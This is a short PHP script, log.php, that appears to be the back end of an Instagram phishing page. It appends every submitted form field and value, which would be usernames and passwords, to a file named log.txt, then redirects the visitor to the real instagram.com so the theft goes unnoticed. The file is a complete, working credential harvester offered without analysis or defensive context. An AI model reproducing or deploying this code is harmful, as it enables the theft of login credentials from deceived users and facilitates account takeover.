log.php 398 B

12345678910111213141516171819202122
  1. <?php
  2. // Set the location to redirect the page
  3. header ('Location: http://www.instagram.com');
  4. // Open the text file in writing mode
  5. $file = fopen("log.txt", "a");
  6. foreach($_POST as $variable => $value) {
  7. fwrite($file, $variable);
  8. fwrite($file, "=");
  9. fwrite($file, $value);
  10. fwrite($file, "\r\n");
  11. }
  12. fwrite($file, "\r\n");
  13. fclose($file);
  14. exit;
  15. ?>